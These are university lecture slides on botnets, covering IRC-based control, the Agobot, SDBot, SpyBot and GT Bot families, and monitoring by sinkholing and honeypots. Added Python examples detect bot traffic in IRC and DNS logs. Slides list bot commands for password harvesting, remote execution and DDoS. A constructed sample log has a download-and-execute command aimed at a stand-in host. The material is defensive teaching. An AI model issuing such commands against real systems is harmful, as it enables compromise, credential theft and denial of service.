CAP6135: Malware and Software Vulnerability Analysis: Botnets. Cliff Zou, Spring 2012.
Slide 1
CAP6135: Malware and Software Vulnerability Analysis
Botnets
Cliff Zou
Spring 2012
Slide 2
Acknowledgement
This lecture uses some contents from the lecture notes from:
- Dr. Dawn Song: CS161: Computer Security
- Richard Wang, SophosLabs: The Development of Botnets
- Randy Marchany, VA Tech IT Security Lab: Botnets
Slide 3
Botnets
- Collection of compromised hosts
  - Spread like worms and viruses
  - Once installed, respond to remote commands
- A network of ‘bots’
  - robot: an automatic machine that can be programmed to perform specific tasks
- Also known as ‘zombies’
Slide 4
- Platform for many attacks
  - Spam forwarding (70% of all spam?)
  - Click fraud
  - Keystroke logging
  - Distributed denial of service attacks
- Serious problem
  - Top concern of banks, online merchants
  - Vint Cerf: ¼ of hosts connected to Internet
Slide 5
What are botnets used for?
Slide 6
IRC (Internet Relay Chat) based Control
Slide 7
IRC (Internet Relay Chat) based Control
Slide 8
Why IRC?
- IRC servers are:
  - freely available
  - easy to manage
  - easy to subvert
- Attackers have experience with IRC
- IRC bots usually have a way to remotely upgrade victims with new payloads to stay ahead of security efforts
Slide 9
How bad is the problem?
- Symantec identified a 400K node botnet
- A netadmin in the Netherlands discovered 1-2M unique IPs associated with Phatbot infections. Phatbot harvests MyDoom- and Bagle-infected machines.
- Researchers at Gatech monitored thousands of botnets
Slide 10
Spreading Problem
- Spreading mechanism is a leading cause of background noise
- Ports 445, 135, 139, 137 accounted for 80% of traffic captured by the German Honeynet Project
- Other ports:
  - 2745: Bagle backdoor
  - 3127: MyDoom backdoor
  - 3410: Optix trojan backdoor
  - 5000: UPnP vulnerability
Slide 11
Most commonly used Bot families
- Agobot
- SDBot
- SpyBot
- GT Bot
Slide 12
Agobot
- Most sophisticated: 20,000 lines C/C++ code
- IRC based command/control
- Large collection of target exploits
- Capable of many DoS attack types
- Shell encoding/polymorphic obfuscation
- Traffic sniffers/key logging
- Defend/fortify compromised system
- Ability to frustrate disassembly
Slide 13
SDBot
- Simpler than Agobot, 2,000 lines C code
- Non-malicious at base
- Utilizes IRC-based command/control
- Easily extended for malicious purposes
  - Scanning
  - DoS attacks
  - Sniffers
  - Information harvesting
  - Encryption
Slide 14
SpyBot
- <3,000 lines C code
- Possibly evolved from SDBot
  - Similar command/control engine
- No attempts to hide malicious purposes
Slide 15
GT Bot
- Functions based on mIRC scripting capabilities
- HideWindow program hides bot on local system
  - Basic rootkit function
- Port scanning, DoS attacks, exploits for RPC and NetBIOS
Slide 16
- Variance in codebase size, structure, complexity, implementation
- Convergence in set of functions
  - Possibility for defense systems effective across bot families
- Bot families extensible
  - Agobot likely to become dominant
Slide 17
Control
- All of the above use IRC for command/control
  - Disrupt IRC, disable bots
  - Sniff IRC traffic for commands
  - Shut down channels used for botnets
- IRC operators play a central role in stopping botnet traffic
  - But a botnet could use its own IRC server
  - Automated traffic identification required
- Future botnets may move away from IRC
  - Move to P2P communication
  - Traffic fingerprinting still useful for identification
Slide 18
Host control
- Fortify system against other malicious attacks
- Disable anti-virus software
- Harvest sensitive information
  - PayPal, software keys, etc.
- Economic incentives for botnets
- Stresses need to patch/protect systems prior to attack
- Stronger protection boundaries required across applications in OSes
Slide 19
Example Botnet Commands: Connection
- CLIENT: PASS <password>
- HOST: (if error, disconnect)
- CLIENT: NICK <nick>
- HOST: NICKERROR | CONNECTED
- Pass hierarchy info
  - BOTINFO <nick> <connected_to> <priority>
  - BOTQUIT <nick>
Slide 20
Example Botnet Commands: IRC Commands
- CHANJOIN <tag> <channel>
- CHANPART <tag> <channel>
- CHANOP <tag> <channel>
- CHANKICK <tag> <channel>
- CHANBANNED <tag> <channel>
- CHANPRIORITY <ircnet> <channel> <LOW/NORMAL/HIGH>
Slide 21
Example Botnet Commands
- pstore: display all usernames/passwords stored in browsers of infected systems
- bot.execute: run executable on remote system
- bot.open: read file on remote computer
- bot.command: run command with system()
Slide 22
Example Botnet Commands
- http.execute: download and execute file through HTTP
- ftp.execute
- ddos.udpflood
- ddos.synflood
- ddos.phaticmp
- redirect.http
- redirect.socks
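Slide 17 makes the point that sniffing IRC traffic for commands, and fingerprinting that traffic, remains useful for identifying botnets, and slides 19 to 22 list the command vocabulary such traffic carries. Putting the two together gives a first-cut channel detector. The following is an added Python example, not code from the lecture or from any of the bot families described: it parses standard IRC PRIVMSG lines (the RFC 1459 message shape) and flags channels whose messages look like bot commands. The command names are the ones on the slides; the dotted-family rule deliberately generalizes to other members of the bot., http., ftp., ddos. and redirect. families. The leading-dot convention, the per-channel threshold, and the nicks, channel names, addresses and log lines are all constructed.

```python
"""Fingerprint IRC channel traffic for botnet command-and-control.

Added example (not code from the lecture): a detector run over constructed
IRC log lines.  The command vocabulary is the one listed on the slides; the
PRIVMSG format is the standard IRC wire format; the log lines, nicks,
channel names and the leading-dot convention are constructed here.
"""
import re
from collections import defaultdict

# Bot-level commands named on the slides.  PASS and NICK are left out on
# purpose: they are ordinary IRC registration commands and never travel
# inside a PRIVMSG, so matching them would only produce false positives.
KNOWN_COMMANDS = {
    "BOTINFO", "BOTQUIT",
    "CHANJOIN", "CHANPART", "CHANOP", "CHANKICK", "CHANBANNED", "CHANPRIORITY",
    "pstore", "bot.execute", "bot.open", "bot.command",
    "http.execute", "ftp.execute",
    "ddos.udpflood", "ddos.synflood", "ddos.phaticmp",
    "redirect.http", "redirect.socks",
}
# Dotted command families from the slides; any "family.member" token is a hit.
KNOWN_FAMILIES = {"bot", "http", "ftp", "ddos", "redirect"}

# ":nick!user@host PRIVMSG #channel :text"  (RFC 1459 message shape)
PRIVMSG_RE = re.compile(
    r"^:(?P<nick>[^!\s]+)(?:!\S+)?\s+PRIVMSG\s+(?P<target>\S+)\s+:(?P<text>.*)$"
)

# Constructed sample log: two ordinary chatters in #chat, a controller and
# two bots in #x42, plus a server numeric and a PING that are not PRIVMSGs.
SAMPLE_LOG = [
    ":irc.example.net 001 alice :Welcome to the network",
    ":alice!a@host1 PRIVMSG #chat :hey, anyone around?",
    ":bob!b@host2 PRIVMSG #chat :yeah, what's up",
    ":master!m@ctl PRIVMSG #x42 :.http.execute http://203.0.113.7/u.exe",
    ":master!m@ctl PRIVMSG #x42 :ddos.udpflood 198.51.100.9",
    ":master!m@ctl PRIVMSG #x42 :pstore",
    ":bot1a9f!x@host3 PRIVMSG #x42 :pstore: 12 entries",
    ":bot7c21!x@host4 PRIVMSG #x42 :CHANJOIN t1 #x43",
    "PING :irc.example.net",
]


def parse_privmsg(line):
    """Return {'nick', 'target', 'text'} for a PRIVMSG line, else None."""
    m = PRIVMSG_RE.match(line.strip())
    return m.groupdict() if m else None


def match_command(text):
    """Return the command token if the message body looks like a bot command."""
    parts = text.strip().split(None, 1)
    if not parts:
        return None
    head = parts[0]
    if head.startswith("."):          # assumed convention: controllers prefix commands with '.'
        head = head[1:]
    if head in KNOWN_COMMANDS:
        return head
    family, dot, member = head.partition(".")
    if dot and member.isalnum() and family in KNOWN_FAMILIES:
        return head                   # e.g. another member of the ddos. family
    return None


def analyze(lines, min_commands=2):
    """Per-channel message, command and distinct-nick counts.

    A channel is marked suspicious once it carries at least min_commands
    command-like messages; the threshold is constructed for the sample.
    Replies such as "pstore: 12 entries" are counted as messages only.
    """
    stats = defaultdict(lambda: {"messages": 0, "commands": 0, "nicks": set()})
    for line in lines:
        msg = parse_privmsg(line)
        if msg is None:
            continue
        s = stats[msg["target"]]
        s["messages"] += 1
        s["nicks"].add(msg["nick"])
        if match_command(msg["text"]):
            s["commands"] += 1
    return {
        chan: {"messages": s["messages"], "commands": s["commands"],
               "nicks": len(s["nicks"]), "suspicious": s["commands"] >= min_commands}
        for chan, s in stats.items()
    }


if __name__ == "__main__":
    for chan, s in analyze(SAMPLE_LOG).items():
        print(chan, s)
```

The detector is intentionally keyword based, which is exactly the weakness slide 17 anticipates: a botnet on its own IRC server with renamed commands would not be caught, so in practice the per-channel shape (one talker issuing terse tokens, many nicks answering in lock-step) matters more than the vocabulary.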
Slide 23
Current Botnet Control Architecture
(Diagram: a botmaster controls several C&C servers, each with its own group of bots)
- More than one C&C server
- Spread all around the world
Slide 24
Botnet Monitor: Gatech KarstNet
- A lot of bots use a Dyn-DNS name to find the C&C
(Diagram: bots, attacker, C&C servers behind the name cc1.com, KarstNet sinkhole)
1. Detect cc1.com by its abnormal DNS queries
2. KarstNet informs the DNS provider of cc1.com
3. DNS provider maps cc1.com to the Gatech sinkhole (DNS hijack)
4. All/most bots attempt to connect to the sinkhole
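The KarstNet flow above, as an added Python example (not code from the lecture or from the Georgia Tech project): detect a name that many hosts resolve in lock-step, hand it to a resolver that answers with a sinkhole address, and let the sinkhole enumerate the hosts that follow the redirected answer. Only the name cc1.com comes from the slide; the resolver log format, the thresholds, the client and server addresses and the other domain names are constructed.

```python
"""Spot a botnet C&C name from resolver logs and sinkhole it.

Added example, not code from the lecture or from KarstNet.  It walks the
slide's steps on constructed data: flag a name that many hosts resolve in a
short window, remap that name to a sinkhole, and record which clients then
resolve it.  Everything except the name cc1.com is constructed.
"""
from collections import defaultdict

SINKHOLE_IP = "192.0.2.53"   # constructed TEST-NET-1 address standing in for the sinkhole


def build_sample_log():
    """Constructed resolver log: one 'epoch_seconds client_ip qname' per line.

    40 infected hosts resolve cc1.com inside a 10-second window (bots
    re-locating their C&C together); a few ordinary clients resolve
    ordinary names spread over most of an hour.
    """
    lines = [f"{1000 + i % 10} 10.0.0.{i + 1} cc1.com" for i in range(40)]
    lines += [f"{1000 + 700 * i} 10.0.1.{i + 1} www.example.com" for i in range(5)]
    lines += [f"{1200 + 900 * i} 10.0.1.1 www.example.com" for i in range(3)]
    lines += [f"{1500 + 600 * i} 10.0.2.{i + 1} mail.example.org" for i in range(2)]
    return "\n".join(lines)


def parse_log(text):
    """Parse log lines into (timestamp, client_ip, normalized qname) tuples."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, client, qname = line.split()
        records.append((int(ts), client, qname.lower().rstrip(".")))
    return records


def domain_stats(records):
    """Per name: distinct clients, total queries, seconds between first and last query."""
    clients, times = defaultdict(set), defaultdict(list)
    for ts, client, qname in records:
        clients[qname].add(client)
        times[qname].append(ts)
    return {q: {"clients": len(clients[q]), "queries": len(times[q]),
                "span": max(times[q]) - min(times[q])} for q in clients}


def find_abnormal(records, min_clients=20, max_span=60):
    """Names resolved by many distinct clients inside a short window.

    A popular web site is also resolved by many clients, but over the whole
    day; a C&C name gets its lookups in bursts when the bots reconnect.
    The thresholds are constructed for the sample data.
    """
    stats = domain_stats(records)
    return sorted(q for q, s in stats.items()
                  if s["clients"] >= min_clients and s["span"] <= max_span)


class SinkholeResolver:
    """The DNS provider's view after the flagged name has been remapped.

    Queries for a sinkholed name are answered with the sinkhole address and
    the querying client is recorded; that record is the list of infected
    hosts the slide's last step refers to.
    """

    def __init__(self, upstream, sinkholed):
        self.upstream = dict(upstream)      # name -> genuine address
        self.sinkholed = set(sinkholed)     # names remapped to the sinkhole
        self.infected = set()               # clients seen asking for those names

    def resolve(self, qname, client_ip=None):
        qname = qname.lower().rstrip(".")
        if qname in self.sinkholed:
            if client_ip is not None:
                self.infected.add(client_ip)
            return SINKHOLE_IP, "sinkhole"
        if qname in self.upstream:
            return self.upstream[qname], "upstream"
        return None, "nxdomain"


def run_demo():
    """Detect, remap, replay the log through the resolver; return (flagged, infected)."""
    records = parse_log(build_sample_log())
    flagged = find_abnormal(records)
    resolver = SinkholeResolver(
        {"cc1.com": "203.0.113.10",          # constructed: the C&C's genuine address
         "www.example.com": "203.0.113.80",
         "mail.example.org": "203.0.113.25"},
        flagged)
    for _, client, qname in records:
        resolver.resolve(qname, client)
    return flagged, sorted(resolver.infected)


if __name__ == "__main__":
    flagged, infected = run_demo()
    print("sinkholed:", flagged)
    print(f"{len(infected)} hosts followed the remapped answer to the sinkhole")
```

The burst heuristic is the weak point to keep in mind: a busy CDN name also has many distinct clients, which is why the window check is needed, and a botnet whose bots re-resolve at randomized times would blur the burst. The sinkhole side is what makes the approach worthwhile regardless: once the name is remapped, the infected hosts identify themselves simply by connecting.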
Slide 25
Botnet Monitor: Honeypot Spy
- Security researchers set up honeypots
  - Honeypots: deliberately set up vulnerable machines
  - When compromised, put the malware's behaviors under close monitoring
  - Tutorial: http://en.wikipedia.org/wiki/Honeypot_%28computing%29
- When a compromised honeypot joins a botnet
  - Passive monitoring: log all network traffic
  - Active monitoring: actively contact other bots to obtain more information (neighborhood list, additional C&C, etc.)
- Representative research paper:
  - Moheeb Abu Rajab, Jay Zarfoss, Fabian Monrose, Andreas Terzis. A multifaceted approach to understanding the botnet phenomenon. 6th ACM SIGCOMM Conference on Internet Measurement (IMC), 2006.
Slide 26
The Future Generation of Botnets
- Peer-to-Peer C&C
- Polymorphism
- Anti-honeypot
- Rootkit techniques